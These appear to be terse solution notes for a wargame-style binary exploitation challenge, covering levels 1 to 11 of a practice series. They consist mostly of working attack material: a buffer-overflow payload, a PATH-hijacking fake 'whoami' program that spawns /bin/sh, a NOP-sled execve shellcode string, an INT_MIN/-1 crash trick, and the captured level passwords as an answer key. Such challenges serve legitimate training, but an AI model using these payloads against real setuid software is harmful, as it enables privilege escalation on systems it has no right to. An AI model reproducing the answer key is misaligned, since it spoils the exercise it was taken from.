Start:
gdb -q level01
set disassembly-flavor intel
disass main
0x08048080 <+0>: push 0x8049128
0x08048085 <+5>: call 0x804810f <puts>
0x0804808a <+10>: call 0x804809f <fscanf>
0x0804808f <+15>: cmp eax,0x10f
0x08048094 <+20>: je 0x80480dc <YouWin>
0x0804809a <+26>: call 0x8048103 <exit>
Set a breakpoint at 0x0804808a <+10>:
b *(main+10)
or:
b *(0x0804808a)
password : 271 (0x10f in hex, the constant that main+15 compares against eax before jumping to YouWin)
cat /home/level2/.pass
hgvbmkQIHavkGg5wykLv2
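./level02 -2147483648 -1
(The arguments are INT_MIN and -1. Presumably the program divides the first by the second; that quotient does not fit in a 32-bit signed int, which on x86 raises SIGFPE instead of returning a value.)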
cat /home/level3/.pass
Ib3F7i7FqjziuDOBKi
Lv3:
./level03 $(python -c 'print "A"*76 + "\x74\x84\x04\x08"')
(Overwrite the address of the function bad with the address of the function good.)
9C4Jxjc3O3IjB7nXej
Lv4:
cd /tmp
mkdir namnt
cd namnt
vi whoami.c
#include "stdlib.h"
/*
 * Stand-in program: starts /bin/sh through system() and then exits with
 * status 0, whatever the shell returned.
 *
 * In these notes it is compiled as `whoami` and its directory is put first in
 * PATH before ./level04 is run. Presumably level04 runs `whoami` by bare name,
 * so the PATH lookup finds this binary first (level04's source is not shown
 * here, so confirm). A privileged program avoids this by calling helpers by
 * absolute path and by not inheriting the caller's PATH.
 */
int main(void)
{
    const char *shell_path = "/bin/sh";

    /* The shell's exit status is deliberately discarded. */
    (void)system(shell_path);

    return 0;
}
gcc -o whoami whoami.c
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
pwd
/tmp/namnt
export PATH=/tmp/namnt:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
cd /level
./level04
cat /home/level5/.pass
KGpWsju2vDpmxcxlvm
Lv6:
Shell:
r $(python -c 'print "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x50\x50\x89\xe2\x83\xc2\x08\x89\x14\x24\xb0\x0b\x89\xd3\x89\xe1\x31\xd2\xcd\x80\x90\x90\x90"+"\x90"*64+"\xb0\xfb\xff\xbf"')
9BT8fmYDTPimXXhY3m
Lv7:
u1zqhnHEzaKmzK09Um
Lv8:
gQN3plSIDwulXhGQvl
Lv11:
oYZ4UoMIao6oPNhHCo